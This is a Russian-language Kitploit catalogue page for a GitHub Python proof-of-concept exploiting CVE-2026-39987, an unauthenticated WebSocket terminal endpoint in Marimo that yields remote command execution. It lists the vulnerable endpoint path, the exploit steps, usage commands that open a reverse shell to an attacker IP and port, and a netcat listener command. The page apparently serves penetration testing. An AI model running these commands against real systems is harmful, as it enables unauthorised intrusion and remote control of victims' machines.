Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-39987_RCE_PoC — Python proof-of-concept для CVE-2026-39987, эксплуатирующий неаутентифицированную конечную точку терминала WebSocket для удалённого выполнения команд и получения обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/mfahdk/cve-2026-39987_rce_poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubmfahdk/cve-2026-39987_rce_poc

CVE-2026-39987_RCE_PoC

Python proof-of-concept для CVE-2026-39987, эксплуатирующий неаутентифицированную конечную точку терминала WebSocket для удалённого выполнения команд и получения обратной оболочки.

Репозиторий
11 ч 4 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-39987 — PoC RCE через WebSocket в Marimo

Proof of Concept для CVE-2026-39987, демонстрирующий удалённое выполнение команд через уязвимую конечную точку терминала WebSocket.

Отказ от ответственности: Данный PoC предназначен исключительно для авторизованного тестирования безопасности и образовательных целей. Используйте его только против систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Описание

Уязвимость позволяет неаутентифицированному пользователю взаимодействовать с конечной точкой терминала WebSocket приложения и удалённо выполнять команды.

PoC подключается к:

root@kitploit:~
wss://<target>/terminal/ws

и демонстрирует выполнение команд через WebSocket-соединение.

Целью, использовавшейся при разработке/тестировании данного PoC, была авторизованная лабораторная среда Hack The Box.

Требования

  • Python 3
  • websocket-client

Установите необходимую библиотеку:

root@kitploit:~
pip3 install websocket-client

Использование

root@kitploit:~
python3 test.py <domain>

Пример:

root@kitploit:~
python3 test.py somesite.com

PoC устанавливает WebSocket-соединение и выполняет тестовую команду.

Обратный шелл

PoC также поддерживает опцию обратного шелла:

root@kitploit:~
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>

Пример:

root@kitploit:~
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444

Запустите слушатель перед выполнением PoC:

root@kitploit:~
nc -lvnp 4444

Технические детали

Приложение предоставляет конечную точку терминала WebSocket без требования аутентификации.

PoC:

  1. Устанавливает WebSocket-соединение.
  2. Отключает проверку TLS-сертификата, поскольку лабораторная цель использует самоподписанный сертификат.
  3. Считывает начальное приглашение терминала.
  4. Отправляет команду через WebSocket.
  5. Читает полученный вывод терминала.

Первоначальный вызов ws.recv() важен, поскольку сервер отправляет приглашение оболочки сразу после установления соединения.

Скачать инструмент